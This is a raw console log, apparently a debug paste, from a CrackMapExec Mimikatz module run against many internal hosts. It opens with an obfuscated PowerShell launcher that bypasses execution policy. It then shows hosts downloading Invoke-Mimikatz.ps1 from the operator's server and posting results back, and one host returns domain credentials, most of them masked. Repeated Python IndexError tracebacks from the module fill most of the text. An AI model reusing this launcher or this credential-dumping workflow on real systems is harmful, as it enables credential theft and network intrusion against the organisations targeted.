DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv fc -;sv BW ec;sv tV ((gv fc).value.toString()+(gv BW).value.toString());powershell (gv tV).value.toString() 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" | |
MIMIKATZ SRV6.sometarget.com 445 SRV6 [+] Executed launcher | |
MIMIKATZ 172.28.1.41 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.2.33 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.33', 56008) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.68 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.2.68', 59701) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.47 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.248 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.248', 61174) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.27.2.120 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.60 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.60', 62434) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.195 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.195', 65496) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.61 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.61', 61216) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.50 [*] - - "POST / HTTP/1.1" 200 - | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\user:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\CDC01$:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\user:pass | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\Admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\NTServer\TEST\Server:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
MIMIKATZ 172.23.3.50 [+] Added 5 credential(s) to the database | |
MIMIKATZ 172.23.3.50 [*] Saved raw Mimikatz output to Mimikatz-172.23.3.50-2017-04-13_120338.log | |
MIMIKATZ 172.23.3.84 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.84', 56552) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.11 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.2.11', 61340) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.4.28 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.244 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.244', 52654) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.98 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.98', 52922) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.245 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.245', 51001) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.21 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.21', 51260) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.95 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.95', 57015) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.86 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.86', 58849) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.117 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.117', 52404) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.244 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.244', 63541) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.1.41 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.1.41', 51188) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.119 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.119', 63190) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.47 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.2.47', 59432) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.51 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.51', 54028) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.118 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.118', 58864) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.27.2.121 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.27.2.121', 50047) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.120 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.120', 57442) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.27.2.120 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.27.2.120', 49553) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
